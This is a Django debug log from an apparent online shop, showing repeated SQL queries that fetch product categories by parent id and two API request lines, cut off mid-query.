DEBUG 2019-12-13 14:08:53,476 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:08:53,480 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:08:53,484 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:08:53,488 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:08:53,495 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:08:53,500 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:08:53,504 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:08:53,507 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:08:53,511 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:08:53,517 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:08:53,521 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:08:53,526 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:08:53,535 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:08:53,540 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:08:53,547 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:08:53,551 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:08:53,554 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 14:08:53,560 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:08:53,566 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:08:53,571 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:08:53,576 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) [13/Dec/2019 14:08:53] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-13 14:08:53,581 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:08:53,587 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:08:53,592 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:08:53,596 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:08:53,600 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:08:53,604 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:08:53,610 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:08:53,614 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:08:53,618 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:08:53,622 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:08:53,626 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:08:53,629 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:08:53,631 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:08:53,634 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:08:53,636 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:08:53,638 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:08:53,641 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:08:53,643 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:08:53,646 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:08:53,648 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:08:53,651 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:08:53,653 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:08:53] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:09:26,332 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:09:26,344 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:09:26,350 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:09:26,354 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:09:26,361 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:09:26,365 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:09:26,369 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:09:26,373 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:09:26,378 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:09:26,384 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:09:26,388 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:09:26,392 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:09:26,396 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:09:26,400 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:09:26,406 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:09:26,410 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:09:26,414 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:09:26,418 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:09:26,422 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:09:26,429 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:09:26,433 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:09:26,437 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:09:26,441 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:09:26,445 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:09:26,449 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 